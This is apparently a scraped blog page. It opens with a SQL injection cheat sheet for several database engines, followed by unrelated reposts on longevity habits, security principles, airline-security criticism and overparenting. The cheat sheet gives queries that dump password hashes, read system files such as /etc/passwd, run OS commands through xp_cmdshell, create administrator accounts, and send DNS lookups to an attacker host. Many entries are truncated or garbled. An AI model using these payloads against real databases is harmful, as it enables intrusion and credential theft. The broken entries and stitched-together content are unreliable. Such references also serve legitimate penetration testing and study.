SQL Cheat sheets
Thanks to PentestMonkey.net for this.
MySQL:
| Version | SELECT @@version |
| Comments | SELECT 1; #comment SELECT /*comment*/1; |
| Current User | SELECT user(); SELECT system_user(); |
| List Users | SELECT user FROM mysql.user; -- priv |
| List Password Hashes | SELECT host, user, password FROM mysql.user; -- priv |
| Password Cracker | John the Ripper will crack MySQL password hashes. |
| List Privileges | SELECT grantee, privilege_type, is_grantable FROM SELECT SELECT grantee, table_schema, privilege_type SELECT table_schema, table_name, column_name, |
| List DBA Accounts | SELECT SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv |
| Current Database | SELECT database() |
| List Databases | SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0 SELECT distinct(db) FROM mysql.db -- priv |
| List Columns | SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' |
| List Tables | SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema' |
| Find Tables From Column Name |
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find table which have a column called 'username' |
| Select Nth Row | SELECT |
| Select Nth Char | SELECT substr('abcd', 3, 1); # returns c |
| Bitwise AND | SELECT 6 & 2; # returns 2 SELECT 6 & 1; # returns 0 |
ASCII | SELECT char(65); # returns A |
| Char -> ASCII Value | SELECT ascii('A'); # returns 65 |
| Casting | SELECT cast('1' AS unsigned integer); SELECT cast('123' AS char); |
| String Concatenation | SELECT CONCAT('A','B'); #returns AB SELECT CONCAT('A','B','C'); # returns ABC |
If Statement |
SELECT if(1=1,'foo','bar'); -- returns 'foo' |
| Case Statement | SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A |
| Avoiding Quotes | SELECT 0x414243; # returns ABC |
| Time Delay | SELECT BENCHMARK(1000000,MD5('A')); SELECT SLEEP(5); # >= 5.0.12 |
| Make DNS Requests | Impossible? |
| Command Execution | If |
| Local File Access | ...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files. SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system |
| Hostname, IP Address | Impossible? |
| Create Users | CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv |
| Delete Users | DROP USER test1; -- priv |
| Make User DBA | GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv |
| Location of DB files | SELECT @@datadir; |
| Default/System Databases | information_schema (>= mysql 5.0) mysql |
MSSQL:
| Version | SELECT @@version |
| Comments | SELECT 1 -- comment SELECT /*comment*/1 |
| Current User | SELECT user_name(); SELECT system_user; SELECT user; SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID |
| List Users | SELECT name FROM master..syslogins |
| List Password Hashes | SELECT name, password FROM master..sysxlogins -- priv, mssql 2000; SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer. SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005; SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005 |
| Password Cracker | MSSQL 2000 and 2005 Hashes are both SHA1-based. phrasen|drescher can crack these. |
| List Privileges | Impossible? |
| List DBA Accounts | TODO SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try 'bulkadmin', 'systemadmin' and other values from the documentation SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username. |
| Current Database | SELECT DB_NAME() |
| List Databases | SELECT name FROM master..sysdatabases; SELECT DB_NAME(N); -- for N = 0, 1, 2, ... |
| List Columns | SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list colum names and types for master..sometable |
| List Tables | SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U'; SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list colum names and types for master..sometable |
| Find Tables From Column Name | -- NB: This example works only for the current database. If you wan't to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects). SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- this lists table, column for each column containing the word 'password' |
| Select Nth Row | SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row |
| Select Nth Char | SELECT substring('abcd', 3, 1) -- returns c |
| Bitwise AND | SELECT 6 & 2 -- returns 2 SELECT 6 & 1 -- returns 0 |
ASCII Value -> Char | SELECT char(0x41) -- returns A |
| Char -> ASCII Value | SELECT ascii('A') - returns 65 |
| Casting | SELECT CAST('1' as int); SELECT CAST(1 as char) |
| String Concatenation | SELECT 'A' + 'B' - returns AB |
If | IF (1=1) SELECT 1 ELSE SELECT 2 -- |
| Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1 |
| Avoiding Quotes | SELECT char(65)+char(66) -- returns AB |
| Time Delay | WAITFOR DELAY '0:0:5' -- pause for 5 seconds |
| Make DNS Requests | declare @host varchar(800); select @host = declare -- NB: |
| Command Execution | EXEC xp_cmdshell On MSSQL 2005 you may need to reactivate |
| Local File Access | CREATE TABLE mydata (line varchar(8000)); BULK INSERT mydata FROM 'c:\boot.ini'; DROP TABLE mydata; |
| Hostname, IP Address | SELECT HOST_NAME() |
| Create Users | EXEC sp_addlogin 'user', 'pass'; -- priv |
| Drop Users | EXEC sp_droplogin 'user'; -- priv |
| Make User DBA | EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv |
| Location of DB files | TODO |
| Default/System Databases | northwind model msdb pubs tempdb |
PostgreSQL:
| Version | SELECT version() |
| Comments | SELECT 1; --comment SELECT /*comment*/1; |
| Current User | SELECT user; SELECT current_user; SELECT session_user; SELECT usename FROM pg_user; SELECT getpgusername(); |
| List Users | SELECT usename FROM pg_user |
| List Password Hashes | SELECT usename, passwd FROM pg_shadow -- priv |
| Password Cracker | MDCrack can crack PostgreSQL's MD5-based passwords. |
| List Privileges | SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user |
| List DBA Accounts | SELECT usename FROM pg_user WHERE usesuper IS TRUE |
| Current Database | SELECT current_database() |
| List Databases | SELECT datname FROM pg_database |
| List Columns | SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public') |
| List Tables | SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) |
| Find Tables From Column Name | If you want to list all the table names that SELECT DISTINCT relname FROM |
| Select Nth Row | SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; -- rows numbered from 0 SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1; |
| Select Nth Char | SELECT substr('abcd', 3, 1); -- returns c |
| Bitwise AND | SELECT 6 & 2; -- returns 2 SELECT 6 & 1; --returns 0 |
ASCII | SELECT chr(65); |
| Char -> ASCII Value | SELECT ascii('A'); |
| Casting | SELECT CAST(1 as varchar); SELECT CAST('1' as int); |
| String Concatenation | SELECT 'A' || 'B'; -- returnsAB |
If | IF statements only seem valid inside functions, so aren't much use for SQL injection. See CASE statement instead. |
| Case Statement | SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; -- returns A |
| Avoiding Quotes | SELECT CHR(65)||CHR(66); -- returns AB |
| Time Delay | SELECT pg_sleep(10); -- postgres 8.2+ only CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(10); --priv, create your own sleep function. Taken from here . |
| Make DNS Requests | Generally not SELECT * FROM dblink('host=put.your.hostname.here user=someuser dbname=somedb', 'SELECT version()') RETURNS (result TEXT);Alternatively, |
| Command Execution | CREATE OR REPLACE FUNCTION system(cstring) RETURNS SELECT |
| Local File Access | CREATE Write CREATE TABLE mytable (mycol text); |
| Hostname, IP Address | SELECT inet_server_addr(); -- returns db server IP address (or null if using local connection) SELECT inet_server_port(); -- returns db server IP address (or null if using local connection) |
| Create Users | CREATE USER test1 PASSWORD 'pass1'; -- priv CREATE USER test1 PASSWORD 'pass1' CREATEUSER; -- priv, grant some privs at the same time |
| Drop Users | DROP USER test1; -- priv |
| Make User DBA | ALTER USER test1 CREATEUSER CREATEDB; -- priv |
| Location of DB files | SELECT current_setting('data_directory'); -- priv SELECT current_setting('hba_file'); -- priv |
| Default/System Databases | template0 template1 |
Oracle:
| Version | SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'; SELECT banner FROM v$version WHERE banner LIKE 'TNS%'; SELECT version FROM v$instance; |
| Comments | SELECT 1 FROM dual -- comment -- NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name 'dual' when we're not actually selecting from a table. |
| Current User | SELECT user FROM dual |
| List Users | SELECT username FROM all_users ORDER BY username; SELECT name FROM sys.user$; -- priv |
| List Password Hashes | SELECT name, password, astatus FROM sys.user$ -- priv, <= 10g. astatus tells you if acct is locked SELECT name,spare4 FROM sys.user$ -- priv, 11g |
| Password Cracker | checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10. |
| List Privileges | SELECT * FROM session_privs; -- current privs SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list a user's privs SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users with a particular priv SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS; |
| List DBA Accounts | SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs, DBA roles |
| Current Database | SELECT global_name FROM global_name; SELECT name FROM v$database; SELECT instance_name FROM v$instance; SELECT SYS.DATABASE_NAME FROM DUAL; |
| List Databases | SELECT |
| List Columns | SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo'; |
| List Tables | SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables; |
| Find Tables From Column Name | SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- NB: table names are upper case |
| Select Nth Row | SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; -- gets 9th row (rows numbered from 1) |
| Select Nth Char | SELECT substr('abcd', 3, 1) FROM dual; -- gets 3rd character, 'c' |
| Bitwise AND | SELECT bitand(6,2) FROM dual; -- returns 2 SELECT bitand(6,1) FROM dual; -- returns0 |
ASCII Value -> Char | SELECT chr(65) FROM dual; -- returns A |
| Char -> ASCII Value | SELECT ascii('A') FROM dual; -- returns 65 |
| Casting | SELECT CAST(1 AS char) FROM dual; SELECT CAST('1' AS int) FROM dual; |
| String Concatenation | SELECT 'A' || 'B' FROM dual; -- returns AB |
| If Statement | BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; -- doesn't play well with SELECT statements |
| Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1 SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2 |
| Avoiding Quotes | SELECT chr(65) || chr(66) FROM dual; -- returns AB |
| Time Delay | BEGIN DBMS_LOCK.SLEEP(5); END; -- priv, can't seem to embed this in a SELECT SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse looks are slow SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- if outbound TCP is filtered / slow -- Also see Heavy Queries to create a time delay |
| Make DNS Requests | SELECT UTL_INADDR.get_host_address('google.com') FROM dual; SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; |
| Command Execution | Java ExtProc |
| Local File Access | UTL_FILE Java |
| Hostname, IP Address |
SELECT UTL_INADDR.get_host_name FROM dual; SELECT host_name FROM v$instance; SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- gets hostnames |
| Location of DB files | SELECT name FROM V$DATAFILE; |
| Default/System Databases | SYSTEM SYSAUX |
Ingres:
| Version | select dbmsinfo('_version'); |
| Comments | SELECT 123; -- comment select 123; /* comment */ |
| Current User | select dbmsinfo('session_user'); select dbmsinfo('system_user'); |
| List Users | First connect to iidbdb, then: select name, password from iiuser; |
| Create Users | create user testuser with password = 'testuser';-- priv |
| List Password Hashes | First connect to iidbdb, then: select name, password from iiuser; |
| List Privileges | select dbmsinfo('db_admin'); select dbmsinfo('create_table'); select dbmsinfo('create_procedure'); select dbmsinfo('security_priv'); select dbmsinfo('select_syscat'); select dbmsinfo('db_privileges'); select dbmsinfo('current_priv_mask'); |
| Current Database | select dbmsinfo('database'); |
| List Columns | select column_name, column_datatype, table_name, table_owner from iicolumns; |
| List Tables | select table_name, table_owner from iitables; select relid, relowner, relloc from iirelation; select relid, relowner, relloc from iirelation where relowner != '$ingres'; |
| Select Nth Row | Astoundingly, select top |
| Select Nth Char | select substr('abc', 2, 1); -- returns 'b' |
| Bitwise AND | The function "bit_and" exists, but seems hard to select substr(bit_and(cast(3 as |
| Casting | select cast(123 as varchar); select cast('123' as integer); |
| String Concatenation | select 'abc' || 'def'; |
| Time Delay | ??? See |
| Installing Locally | The Ingres database can be downloaded for free from http://esd.ingres.com/ A pre-built Linux-based Ingres Database Server can be download from http://www.vmware.com/appliances/directory/832 |
| Database Client | TODO There is a client called "sql" which can be used for local connections (at least) in the database server package above. |
| Logging in from command line | $ su - ingres $ sql iidbdb * select dbmsinfo('_version'); \go |
The
following areas are interesting enough to include on this page, but I
haven't researched them for other databases:
| Description | SQL / Comments |
| Batching Queries Allowed? | Not |
| FROM clause mandated in SELECTs? | No. |
| UNION supported | Yes. |
| Enumerate Tables Privs | select table_name, permit_user, permit_type from iiaccess; |
| Length of a string | select length('abc'); -- returns 3 |
| Roles and passwords | First you need to connect to iidbdb, then: |
| List Database Procedures | First you need to connect to iidbdb, |
| Create Users + Granting Privs | First you need to connect to iidbdb, |
DB2:
| Version | select versionnumber, version_timestamp from sysibm.sysversions; |
| Comments | select blah from foo; -- comment like this |
| Current User | select user from sysibm.sysdummy1; select session_user from sysibm.sysdummy1; select system_user from sysibm.sysdummy1; |
| List Users | N/A (I think DB2 uses OS-level user accounts for Database authorities (like roles, I think) can |
| List Password Hashes | N/A (I think DB2 uses OS-level user accounts for authentication.) |
| List Privileges | select * from syscat.tabauth; -- privs on tables select * from syscat.dbauth where grantee = current user; select * from syscat.tabauth where grantee = current user; |
| Current Database | select current server from sysibm.sysdummy1; |
| List Databases | SELECT schemaname FROM syscat.schemata; |
| List Columns | select name, tbname, coltype from sysibm.syscolumns; |
| List Tables | select name from sysibm.systables; |
| Select Nth Row | select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only; |
| Select Nth Char | SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1; -- returns b |
| Bitwise AND | This page seems to indicate that DB2 has no support for bitwise operators! |
ASCII | select chr(65) from sysibm.sysdummy1; -- returns 'A' |
| Char -> ASCII Value | select ascii('A') from sysibm.sysdummy1; -- returns 65 |
| Casting | SELECT cast('123' as integer) FROM sysibm.sysdummy1; SELECT cast(1 as char) FROM sysibm.sysdummy1; |
| String Concatenation | SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc' select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab' |
Informix:
| Version | SELECT DBINFO('version', 'full') FROM systables WHERE tabid = 1; SELECT DBINFO('version', 'server-type') FROM systables WHERE tabid = 1; SELECT DBINFO('version', 'major'), DBINFO('version', 'minor'), DBINFO('version', 'level') FROM systables WHERE tabid = 1; SELECT DBINFO('version', 'os') FROM systables WHERE tabid = 1; -- T=Windows, U=32 bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app running on 64-bit unix |
| Comments | select 1 FROM systables WHERE tabid = 1; -- comment |
| Current User | SELECT USER FROM systables WHERE tabid = 1; |
| List Users | select username, usertype, password from sysusers; |
| List Privileges | select tabname, grantor, grantee, tabauth FROM systabauth join systables on systables.tabid = systabauth.tabid; -- which tables are accessible by which users select procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid; -- which procedures are accessible by which users |
| Current Database | SELECT DBSERVERNAME FROM systables where tabid = 1; -- server name |
| List Databases | select name, owner from sysdatabases; |
| List Columns | select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid; |
| List Tables | select tabname, owner FROM systables; select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid; |
| List Stored Procedures | select procname, owner FROM sysprocedures; |
| Find Tables From Column Name | select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid where colname like '%pass%'; |
| Select Nth Row | select first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc; -- selects the 10th row |
| Select Nth Char | SELECT SUBSTRING('ABCD' FROM 3 FOR 1) FROM systables where tabid = 1; -- returns 'C' |
| Bitwise AND | select bitand(6, 1) from systables where tabid = 1; -- returns 0 select bitand(6, 2) from systables where tabid = 1; -- returns 2 |
| Char -> ASCII Value | select ascii('A') from systables where tabid = 1; |
| Casting | select cast('123' as integer) from systables where tabid = 1; select cast(1 as char) from systables where tabid = 1; |
| String Concatenation | SELECT 'A' || 'B' FROM systables where tabid = 1; -- returns 'AB' SELECT concat('A', 'B') FROM systables where tabid = 1; -- returns 'AB' |
| String Length | SELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables; |
| Case Statement | select tabid, case when tabid>10 then "High" else 'Low' end from systables; |
| Hostname, IP Address | SELECT DBINFO('dbhostname') FROM systables WHERE tabid = 1; -- hostname |
| Default/System Databases | These are the system databases: sysmaster sysadmin* sysuser* sysutils* * = don't seem to contain anything / don't allow reading |
| Installing Locally | You can download Informix |
| Database Client | There's a database client SDK available, but I couldn't get the demo client working. I used SQuirreL SQL Client Version 2.6.8 after installing the Informix JDBC drivers ("emerge dev-java/jdbc-informix" on Gentoo). |
| Logging in from command line | If you get local admin rights on a
The following set INFORMIXDIR=C:\PROGRA~1\IBM\IBMINF~1\11.50<br />set INFORMIXSERVER=testservername<br />set ONCONFIG=ONCONFIG.testservername<br />set PATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\PROGRA~1\ibm\gsk7\bin;C:\PROGRA~1\ibm\gsk7\lib;C:\Program Files\IBM\Informix\Clien-SDK\bin;C:\Program Files\ibm\gsk7\bin;C:\Program Files\ibm\gsk7\lib<br />set CLASSPATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\extend\krakatoa\krakatoa.jar;C:\PROGRA~1\IBM\IBMINF~1\11.50\xtend\krakatoa\jdbc.jar;<br />set DBTEMP=C:\PROGRA~1\IBM\IBMINF~1\11.50\infxtmp<br />set CLIENT_LOCALE=EN_US.CP1252<br />set DB_LOCALE=EN_US.8859-1<br />set SERVER_LOCALE=EN_US.CP1252<br />set DBLANG=EN_US.CP1252<br />mode con codepage select=1252<br /> |
Identifying on the network | My 10.0.0.1 -p- -v --version-all ... 1526/tcp open pdap-np? 9088/tcp open unknown 9089/tcp open unknown ... TODO How would we identify Informix listening on the network? |
Presentation: 9 ways to live better, longer, happier
From here:
Dan Buettner: How to live to be 100+
I'm not crazy about the typical PowerPoint template used in a few of the slides, but most of the time the screen was filled with full-screen images (Left) or video clips (Right) that were a good complement to the talk.
In Sum
What are the common denominators running through the different cultures they studied? If you do not have time to watch the video, I summarized them below in my own words. You can go to the Blue Zones website to get all the details.
(1) You don't need a formal, rigorous exercise plan. We're talking here a change in lifestyle that is fundamentally active. We're designed to move. We've not meant to drive 100 meters in a car to pick up chips at the local store. Walk, do yard work, whatever. Do exercises/activities that you enjoy.
Have Right Outlook
(2) Slow down. When you're constantly in a hurry and stressed out, this has a negative impact on your health. Limiting negative stress is one of the healthiest things you can do for yourself.
(3) Have a clear purpose. The Japanese call it "ikigai" ???? (lit: life + value, be worth while). You must have a passion, a calling, a purpose. There's got to be a reason to get out of bed every day.
Eat Wisely
(4) Drink a little (wine) everyday.
(5) Eat mainly plant-based foods. Small amounts of meat and fish are OK.
(6) Hara Hachi Bu: Eat until 80% full. Do not eat eat until you're stuffed. (I've talked about this many time before in the context of presentation.)
Be Connected with others
(7) Put family, loved ones first.
(8) Belong to a community. Many in his study belonged to faith-based communities.
(9) Belong to the right tribe. That is, hang out with people with healthy habits, physical and emotional ones.
How to live a long, healthy life in one slide
Even nine recommendations can be hard to remember, so I simplified the advice down to five in this Keynote slide that capture the essence of the tips from Dan Buettner's good TEDx talk.
(Click on image of slide for a larger size.)

My Personal Security Guiding Principles
From here:
-------------------------------
Fall of 2009 marks the 20th anniversary of the start of my professional security career. That was the first day someone stuck a yellow shirt on my back and sent me into a crowd of drunk college football fans at the University of Colorado (later famous for its student riots). I'm pretty sure someone screwed up, since it was my first day on the job and I was assigned a rover position -- which normally goes to someone who knows what the f&%$ they are doing, not some 18 year old, 135-lb kid right out of high school. And yes, I was breaking up fights on my first day (the stadium wasn't dry until a few years later).
If you asked me then, I never would have guessed I'd spend the next couple decades working through the security ranks, eventually letting my teenage geek/hacker side take over. Over that time I've come to rely on the following guiding principles in everything from designing my personal security to giving advice to clients:
- Don't expect human behavior to change. Ever.
- You cannot survive with defense alone.
- Not all threats are equal, and all checklists are wrong.
- You cannot eliminate all vulnerabilities.
- You will be breached.
There's a positive side to each of these negative principles:
- Design security controls that account for human behavior. Study cognitive science and practical psychology to support your decisions. This is also critical for gaining support for security initiatives, not just design of individual controls.
- Engage in intelligence and counter-threat operations to the best of your ability. Once an attack has started, your first line of security has already failed.
- Use checklists to remember the simple stuff, but any real security must be designed using a risk-based approach. As a corollary, you can't implement risk-based security if you don't reallyunderstand the risks; and most people don't understand the risks. Be the expert.
- Adopt anti-exploitation wherever possible. Vulnerability-driven security is always behind the threat.
- React faster and better. Incident response is more important than any other single security control.
With one final piece of advice -- keep it simple and pragmatic.
And after 20 years, that's all I've got...
—Rich
Flying high
Very interesting post from Slate magazine:
Why are we so bad at detecting the guilty and so good at collective punishment of the innocent?
It's getting to the point where the twin news stories more or less write themselves. No sooner is the fanatical and homicidal Muslim arrested than it turns out that he (it won't be long until it is also she) has been known to the authorities for a long time. But somehow the watch list, the tipoff, the many worried reports from colleagues and relatives, the placing of the name on a "central repository of information" don't prevent the suspect from boarding a plane, changing planes, or bringing whatever he cares to bring onto a plane. This is now a tradition that stretches back to several of the murderers who boarded civilian aircraft on Sept. 11, 2001, having called attention to themselves by either a) being on watch lists already or b) weird behavior at heartland American flight schools. They didn't even bother to change their names.
In my boyhood, there were signs on English buses that declared, in bold letters, "No Spitting." At a tender age, I was able to work out that most people don't need to be told this, while those who do feel a desire to expectorate on public transport will require more discouragement than a mere sign. But I'd be wasting my time pointing this out to our majestic and sleepless protectors, who now boldly propose to prevent airline passengers from getting out of their seats for the last hour of any flight. Abdulmutallab made his bid in the last hour of his flight, after all. Yes, that ought to do it. It's also incredibly, nay, almost diabolically clever of our guardians to let it be known what the precise time limit will be. Oh, and by the way, any passenger courageous or resourceful enough to stand up and fight back will also have broken the brave new law.
For some years after 9/11, passengers were forbidden to get up and use the lavatory on the Washington-New York shuttle. Zero tolerance! I suppose it must eventually have occurred to somebody that this ban would not deter a person who was willing to die, so the rule was scrapped. But now the principle has been revisited for international flights. For many years after the explosion of the TWA plane over Long Island (a disaster that was later found to have nothing at all to do with international religious nihilism), you could not board an aircraft without being asked whether you had packed your own bags and had them under your control at all times. These two questions are the very ones to which a would-be hijacker or bomber would honestly and logically have to answer "yes." But answering "yes" to both was a condition of being allowed on the plane! Eventually, that heroic piece of stupidity was dropped as well. But now fresh idiocies are in store. Nothing in your lap during final approach. Do you feel safer? If you were a suicide-killer, would you feel thwarted or deterred?
Why do we fail to detect or defeat the guilty, and why do we do so well at collective punishment of the innocent? The answer to the first question is: Because we can't—or won't. The answer to the second question is: Because we can. The fault here is not just with our endlessly incompetent security services, who give the benefit of the doubt to people who should have been arrested long ago or at least had their visas and travel rights revoked. It is also with a public opinion that sheepishly bleats to be made to "feel safe." The demand to satisfy that sad illusion can be met with relative ease if you pay enough people to stand around and stare significantly at the citizens' toothpaste. My impression as a frequent traveler is that intelligent Americans fail to protest at this inanity in case it is they who attract attention and end up on a no-fly list instead. Perfect.
It was reported over the weekend that in the aftermath of the Detroit fiasco, no official decision was made about whether to raise the designated "threat level" from orange. Orange! Could this possibly be because it would be panicky and ridiculous to change it to red and really, really absurd to lower it to yellow? But isn't it just as preposterous (and revealing), immediately after a known Muslim extremist has waltzed through every flimsy barrier, to leave it just where it was the day before?
What nobody in authority thinks us grown-up enough to be told is this: We had better get used to being the civilians who are under a relentless and planned assault from the pledged supporters of a wicked theocratic ideology. These people will kill themselves to attack hotels, weddings, buses, subways, cinemas, and trains. They consider Jews, Christians, Hindus, women, homosexuals, and dissident Muslims (to give only the main instances) to be divinely mandated slaughter victims. Our civil aviation is only the most psychologically frightening symbol of a plethora of potential targets. The future murderers will generally not be from refugee camps or slums (though they are being indoctrinated every day in our prisons); they will frequently be from educated backgrounds, and they will often not be from overseas at all. They are already in our suburbs and even in our military. We can expect to take casualties. The battle will go on for the rest of our lives. Those who plan our destruction know what they want, and they are prepared to kill and die for it. Those who don't get the point prefer to whine about "endless war," accidentally speaking the truth about something of which the attempted Christmas bombing over Michigan was only a foretaste. While we fumble with bureaucracy and euphemism, they are flying high.
Helicopter parenting: The Growing Backlash Against Overparenting
I just read some VERY interesting reading, something I've noticed myself even though I'm only a new parent.
--------------------------
From here with some deleted links (just advertising for other Time.com articles):
The insanity crept up on us slowly; we just wanted what was best for our kids. We bought macrobiotic cupcakes and hypoallergenic socks, hired tutors to correct a 5-year-old's "pencil-holding deficiency," hooked up broadband connections in the treehouse but took down the swing set after the second skinned knee. We hovered over every school, playground and practice field — "helicopter parents," teachers christened us, a phenomenon that spread to parents of all ages, races and regions. Stores began marketing stove-knob covers and "Kinderkords" (also known as leashes; they allow "three full feet of freedom for both you and your child") and Baby Kneepads (as if babies don't come prepadded). The mayor of a Connecticut town agreed to chop down three hickory trees on one block after a woman worried that a stray nut might drop into her new swimming pool, where her nut-allergic grandson occasionally swam. A Texas school required parents wanting to help with the second-grade holiday party to have a background check first. Schools auctioned off the right to cut the carpool line and drop a child directly in front of the building — a spot that in other settings is known as handicapped parking.
We were so obsessed with our kids' success that parenting turned into a form of product development. Parents demanded that nursery schools offer Mandarin, since it's never too soon to prepare for the competition of a global economy. High school teachers received irate text messages from parents protesting an exam grade before class was even over; college deans described freshmen as "crispies," who arrived at college already burned out, and "teacups," who seemed ready to break at the tiniest stress.
This is what parenting had come to look like at the dawn of the 21st century — just one more extravagance, the Bubble Wrap waiting to burst.
All great rebellions are born of private acts of civil disobedience that inspire rebel bands to plot together. And so there is now a new revolution under way, one aimed at rolling back the almost comical overprotectiveness and overinvestment of moms and dads. The insurgency goes by many names — slow parenting, simplicity parenting, free-range parenting — but the message is the same: Less is more; hovering is dangerous; failure is fruitful. You really want your children to succeed? Learn when to leave them alone. When you lighten up, they'll fly higher. We're often the ones who hold them down.
A backlash against overparenting had been building for years, but now it reflects a new reality. Since the onset of the Great Recession, according to a CBS News poll, a third of parents have cut their kids' extracurricular activities. They downsized, downshifted and simplified because they had to — and often found, much to their surprise, that they liked it. When a TIME poll last spring asked how the recession had affected people's relationships with their kids, nearly four times as many people said relationships had gotten better as said they'd gotten worse. "This is one of those moments when everything is on the table, up for grabs," says Carl Honoré, whose book Under Pressure: Rescuing Our Children from the Culture of Hyper-Parenting is a gospel of the slow-parenting movement. He likens the sudden awareness to the feeling you get when you wake up after a long night carousing, the lights go on, and you realize you're a mess. "That horrible moment of self-recognition is where we are culturally. I wanted parents to realize they are not alone in thinking this is insanity, and show there's another way."
How We Got Here
